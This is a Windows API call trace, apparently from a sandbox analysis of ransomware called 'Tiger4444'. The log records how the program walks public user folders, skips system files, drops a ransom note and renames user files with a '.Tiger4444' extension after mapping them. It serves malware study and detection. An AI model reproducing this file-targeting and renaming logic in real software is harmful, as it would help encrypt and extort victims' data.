ftCreationTime.dwLowDateTime=0x7fbb21f8, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x7fbb21f8, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x7fbb21f8, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0044.820] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0044.820] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0044.820] FindNextFileW (in: hFindFile=0xc72d88, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x1aa2f0c2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5fdc52c, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5fdc52c, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0044.820] lstrcmpiW (lpString1="desktop.ini", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0044.820] lstrcmpiW (lpString1="desktop.ini", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0044.820] lstrcmpiW (lpString1="desktop.ini", lpString2="Tiger4444.exe") returned -1 [0044.820] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0044.820] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0044.820] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0044.820] lstrcmpiW (lpString1="desktop.ini", lpString2="bootmgr") returned 1 [0044.820] lstrcmpiW (lpString1="desktop.ini", lpString2="pagefile.sys") returned -1 [0044.820] lstrcmpiW (lpString1="desktop.ini", lpString2="boot") returned 1 [0044.820] lstrcmpiW (lpString1="desktop.ini", lpString2="ids.txt") returned -1 [0044.820] lstrcmpiW (lpString1="desktop.ini", lpString2="NTUSER.DAT") returned -1 [0044.820] lstrcpyW (in: lpString1=0x30aeada, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0044.820] SetFileAttributesW (lpFileName="C:\\Users\\Public\\Pictures\\desktop.ini", dwFileAttributes=0x22) returned 1 [0044.820] SetFileAttributesW (lpFileName="C:\\Users\\Public\\Pictures\\desktop.ini", dwFileAttributes=0x6) returned 1 [0044.821] lstrlenW (lpString="desktop.ini") returned 11 [0044.821] lstrlenW (lpString="Tiger4444") returned 9 [0044.821] lstrcmpiW (lpString1="sktop.ini", lpString2="Tiger4444") returned -1 [0044.821] lstrlenW (lpString=".dll") returned 4 [0044.821] lstrcmpiW (lpString1=".ini", lpString2=".dll") returned 1 [0044.821] lstrlenW (lpString=".lnk") returned 4 [0044.821] lstrcmpiW (lpString1=".ini", lpString2=".lnk") returned -1 [0044.821] lstrlenW (lpString=".ini") returned 4 [0044.821] lstrcmpiW (lpString1=".ini", lpString2=".ini") returned 0 [0044.821] FindNextFileW (in: hFindFile=0xc72d88, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x1aa2f0c2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5fdc52c, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5fdc52c, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0044.821] FindClose (in: hFindFile=0xc72d88 | out: hFindFile=0xc72d88) returned 1 [0044.821] lstrcpyW (in: lpString1=0x30aeada, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0044.821] CreateFileW (lpFileName="C:\\Users\\Public\\Pictures\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\public\\pictures\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0044.821] CreateFileMappingW (hFile=0x2ac, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x260 [0044.821] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0044.822] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0044.822] CloseHandle (hObject=0x260) returned 1 [0044.822] CloseHandle (hObject=0x2ac) returned 1 [0044.822] GetCurrentThreadId () returned 0xfa8 [0044.823] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc66548 [0044.823] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\Public\\Music", iMaxLength=2048 | out: lpString1="C:\\Users\\Public\\Music") returned="C:\\Users\\Public\\Music" [0044.823] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc67598 | out: hHeap=0xc50000) returned 1 [0044.823] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66540 | out: hHeap=0xc50000) returned 1 [0044.823] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Public\\Music" | out: lpString1="C:\\Users\\Public\\Music") returned="C:\\Users\\Public\\Music" [0044.823] lstrcatW (in: lpString1="C:\\Users\\Public\\Music", lpString2="\\" | out: lpString1="C:\\Users\\Public\\Music\\") returned="C:\\Users\\Public\\Music\\" [0044.823] lstrcatW (in: lpString1="C:\\Users\\Public\\Music\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\Public\\Music\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\Public\\Music\\.BFC0E91B00AE8A0620D3" [0044.823] CreateFileW (lpFileName="C:\\Users\\Public\\Music\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\public\\music\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2ac [0044.826] WriteFile (in: hFile=0x2ac, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0044.851] FlushFileBuffers (hFile=0x2ac) returned 1 [0044.876] SetFileAttributesW (lpFileName="C:\\Users\\Public\\Music\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0044.876] CloseHandle (hObject=0x2ac) returned 1 [0044.876] lstrlenW (lpString="C:\\Users\\Public\\Music") returned 21 [0044.876] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0044.876] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Music\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd466d9b8, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x7fbb21f8, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc73208 [0044.877] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0044.877] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0044.877] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0044.877] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0044.877] FindNextFileW (in: hFindFile=0xc73208, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd466d9b8, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x7fbb21f8, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0044.877] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0044.877] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0044.877] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0044.877] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0044.877] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0044.877] FindNextFileW (in: hFindFile=0xc73208, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x7fbb21f8, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x7fbb21f8, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x7fbfe5a7, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0044.877] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0044.877] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0044.877] FindNextFileW (in: hFindFile=0xc73208, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x1aa2f0c2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5fdc52c, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5fdc52c, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0044.877] lstrcmpiW (lpString1="desktop.ini", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0044.877] lstrcmpiW (lpString1="desktop.ini", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0044.877] lstrcmpiW (lpString1="desktop.ini", lpString2="Tiger4444.exe") returned -1 [0044.877] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0044.877] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0044.877] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0044.877] lstrcmpiW (lpString1="desktop.ini", lpString2="bootmgr") returned 1 [0044.877] lstrcmpiW (lpString1="desktop.ini", lpString2="pagefile.sys") returned -1 [0044.877] lstrcmpiW (lpString1="desktop.ini", lpString2="boot") returned 1 [0044.877] lstrcmpiW (lpString1="desktop.ini", lpString2="ids.txt") returned -1 [0044.877] lstrcmpiW (lpString1="desktop.ini", lpString2="NTUSER.DAT") returned -1 [0044.877] lstrcpyW (in: lpString1=0x30aead4, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0044.877] SetFileAttributesW (lpFileName="C:\\Users\\Public\\Music\\desktop.ini", dwFileAttributes=0x22) returned 1 [0044.878] SetFileAttributesW (lpFileName="C:\\Users\\Public\\Music\\desktop.ini", dwFileAttributes=0x6) returned 1 [0044.878] lstrlenW (lpString="desktop.ini") returned 11 [0044.878] lstrlenW (lpString="Tiger4444") returned 9 [0044.878] lstrcmpiW (lpString1="sktop.ini", lpString2="Tiger4444") returned -1 [0044.878] lstrlenW (lpString=".dll") returned 4 [0044.878] lstrcmpiW (lpString1=".ini", lpString2=".dll") returned 1 [0044.878] lstrlenW (lpString=".lnk") returned 4 [0044.878] lstrcmpiW (lpString1=".ini", lpString2=".lnk") returned -1 [0044.878] lstrlenW (lpString=".ini") returned 4 [0044.878] lstrcmpiW (lpString1=".ini", lpString2=".ini") returned 0 [0044.878] FindNextFileW (in: hFindFile=0xc73208, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x1aa2f0c2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5fdc52c, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5fdc52c, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0044.878] FindClose (in: hFindFile=0xc73208 | out: hFindFile=0xc73208) returned 1 [0044.878] lstrcpyW (in: lpString1=0x30aead4, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0044.878] CreateFileW (lpFileName="C:\\Users\\Public\\Music\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\public\\music\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0044.879] CreateFileMappingW (hFile=0x2ac, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x260 [0044.879] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0044.879] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0044.879] CloseHandle (hObject=0x260) returned 1 [0044.879] CloseHandle (hObject=0x2ac) returned 1 [0044.880] GetCurrentThreadId () returned 0xfa8 [0044.880] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc66528 [0044.880] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\Public\\Libraries", iMaxLength=2048 | out: lpString1="C:\\Users\\Public\\Libraries") returned="C:\\Users\\Public\\Libraries" [0044.880] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc72f08 | out: hHeap=0xc50000) returned 1 [0044.880] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66520 | out: hHeap=0xc50000) returned 1 [0044.880] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Public\\Libraries" | out: lpString1="C:\\Users\\Public\\Libraries") returned="C:\\Users\\Public\\Libraries" [0044.880] lstrcatW (in: lpString1="C:\\Users\\Public\\Libraries", lpString2="\\" | out: lpString1="C:\\Users\\Public\\Libraries\\") returned="C:\\Users\\Public\\Libraries\\" [0044.880] lstrcatW (in: lpString1="C:\\Users\\Public\\Libraries\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\Public\\Libraries\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\Public\\Libraries\\.BFC0E91B00AE8A0620D3" [0044.880] CreateFileW (lpFileName="C:\\Users\\Public\\Libraries\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\public\\libraries\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2ac [0044.882] WriteFile (in: hFile=0x2ac, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0044.885] FlushFileBuffers (hFile=0x2ac) returned 1 [0044.886] SetFileAttributesW (lpFileName="C:\\Users\\Public\\Libraries\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0044.886] CloseHandle (hObject=0x2ac) returned 1 [0044.887] lstrlenW (lpString="C:\\Users\\Public\\Libraries") returned 25 [0044.887] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0044.887] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Libraries\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x17d53e9c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xb207547d, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x7fc4aa87, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc72d88 [0044.887] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0044.887] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0044.887] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0044.887] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0044.887] FindNextFileW (in: hFindFile=0xc72d88, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x17d53e9c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xb207547d, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x7fc4aa87, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0044.887] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0044.887] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0044.887] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0044.887] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0044.887] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0044.887] FindNextFileW (in: hFindFile=0xc72d88, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x7fc4aa87, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x7fc4aa87, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x7fc4aa87, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0044.887] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0044.887] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0044.888] FindNextFileW (in: hFindFile=0xc72d88, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x1aa2f0c2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5fdc52c, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5fdc52c, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xaf, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0044.888] lstrcmpiW (lpString1="desktop.ini", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0044.888] lstrcmpiW (lpString1="desktop.ini", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0044.888] lstrcmpiW (lpString1="desktop.ini", lpString2="Tiger4444.exe") returned -1 [0044.888] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0044.888] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0044.888] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0044.888] lstrcmpiW (lpString1="desktop.ini", lpString2="bootmgr") returned 1 [0044.888] lstrcmpiW (lpString1="desktop.ini", lpString2="pagefile.sys") returned -1 [0044.888] lstrcmpiW (lpString1="desktop.ini", lpString2="boot") returned 1 [0044.888] lstrcmpiW (lpString1="desktop.ini", lpString2="ids.txt") returned -1 [0044.888] lstrcmpiW (lpString1="desktop.ini", lpString2="NTUSER.DAT") returned -1 [0044.888] lstrcpyW (in: lpString1=0x30aeadc, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0044.888] SetFileAttributesW (lpFileName="C:\\Users\\Public\\Libraries\\desktop.ini", dwFileAttributes=0x22) returned 1 [0044.888] SetFileAttributesW (lpFileName="C:\\Users\\Public\\Libraries\\desktop.ini", dwFileAttributes=0x6) returned 1 [0044.888] lstrlenW (lpString="desktop.ini") returned 11 [0044.888] lstrlenW (lpString="Tiger4444") returned 9 [0044.888] lstrcmpiW (lpString1="sktop.ini", lpString2="Tiger4444") returned -1 [0044.888] lstrlenW (lpString=".dll") returned 4 [0044.888] lstrcmpiW (lpString1=".ini", lpString2=".dll") returned 1 [0044.888] lstrlenW (lpString=".lnk") returned 4 [0044.888] lstrcmpiW (lpString1=".ini", lpString2=".lnk") returned -1 [0044.888] lstrlenW (lpString=".ini") returned 4 [0044.888] lstrcmpiW (lpString1=".ini", lpString2=".ini") returned 0 [0044.888] FindNextFileW (in: hFindFile=0xc72d88, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3816851, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97421a72, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97421a72, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3c0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RecordedTV.library-ms", cAlternateFileName="RECORD~1.LIB")) returned 1 [0044.888] lstrcmpiW (lpString1="RecordedTV.library-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0044.888] lstrcmpiW (lpString1="RecordedTV.library-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0044.888] lstrcmpiW (lpString1="RecordedTV.library-ms", lpString2="Tiger4444.exe") returned -1 [0044.888] lstrcmpiW (lpString1="RecordedTV.library-ms", lpString2=".") returned 1 [0044.889] lstrcmpiW (lpString1="RecordedTV.library-ms", lpString2="..") returned 1 [0044.889] lstrcmpiW (lpString1="RecordedTV.library-ms", lpString2="windows") returned -1 [0044.889] lstrcmpiW (lpString1="RecordedTV.library-ms", lpString2="bootmgr") returned 1 [0044.889] lstrcmpiW (lpString1="RecordedTV.library-ms", lpString2="pagefile.sys") returned 1 [0044.889] lstrcmpiW (lpString1="RecordedTV.library-ms", lpString2="boot") returned 1 [0044.889] lstrcmpiW (lpString1="RecordedTV.library-ms", lpString2="ids.txt") returned 1 [0044.889] lstrcmpiW (lpString1="RecordedTV.library-ms", lpString2="NTUSER.DAT") returned 1 [0044.889] lstrcpyW (in: lpString1=0x30aeadc, lpString2="RecordedTV.library-ms" | out: lpString1="RecordedTV.library-ms") returned="RecordedTV.library-ms" [0044.889] SetFileAttributesW (lpFileName="C:\\Users\\Public\\Libraries\\RecordedTV.library-ms", dwFileAttributes=0x0) returned 1 [0044.889] lstrlenW (lpString="RecordedTV.library-ms") returned 21 [0044.889] lstrlenW (lpString="Tiger4444") returned 9 [0044.889] lstrcmpiW (lpString1="ibrary-ms", lpString2="Tiger4444") returned -1 [0044.889] lstrlenW (lpString=".dll") returned 4 [0044.889] lstrcmpiW (lpString1="y-ms", lpString2=".dll") returned 1 [0044.889] lstrlenW (lpString=".lnk") returned 4 [0044.889] lstrcmpiW (lpString1="y-ms", lpString2=".lnk") returned 1 [0044.889] lstrlenW (lpString=".ini") returned 4 [0044.889] lstrcmpiW (lpString1="y-ms", lpString2=".ini") returned 1 [0044.889] lstrlenW (lpString=".sys") returned 4 [0044.889] lstrcmpiW (lpString1="y-ms", lpString2=".sys") returned 1 [0044.889] CreateFileW (lpFileName="C:\\Users\\Public\\Libraries\\RecordedTV.library-ms" (normalized: "c:\\users\\public\\libraries\\recordedtv.library-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0044.889] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0044.889] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13634239101) returned 1 [0044.889] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=960) returned 1 [0044.889] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89860 [0044.889] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71a60 [0044.889] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6c0, lpName=0x0) returned 0x2c8 [0044.890] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6c0) returned 0xbe0000 [0044.908] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0044.908] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75720 [0044.908] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0044.908] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75608 [0044.908] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0044.908] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75608 | out: hHeap=0xc50000) returned 1 [0044.908] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0044.908] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75720 | out: hHeap=0xc50000) returned 1 [0044.908] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13636130303) returned 1 [0044.908] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89860 | out: hHeap=0xc50000) returned 1 [0044.908] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71a60 | out: hHeap=0xc50000) returned 1 [0044.908] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0044.908] CloseHandle (hObject=0x2c8) returned 1 [0044.908] CloseHandle (hObject=0x260) returned 1 [0044.910] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\Public\\Libraries\\RecordedTV.library-ms.Tiger4444") returned 57 [0044.910] MoveFileExW (lpExistingFileName="C:\\Users\\Public\\Libraries\\RecordedTV.library-ms" (normalized: "c:\\users\\public\\libraries\\recordedtv.library-ms"), lpNewFileName="C:\\Users\\Public\\Libraries\\RecordedTV.library-ms.Tiger4444" (normalized: "c:\\users\\public\\libraries\\recordedtv.library-ms.tiger4444"), dwFlags=0x1) returned 1 [0044.910] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=960 | out: Addend=0xc6f980) returned 15207760 [0044.910] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=18 | out: Addend=0xc6f98c) returned 4389 [0044.910] FindNextFileW (in: hFindFile=0xc72d88, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3816851, ftCreationTime.dwHighDateTime=0x1d112e4, 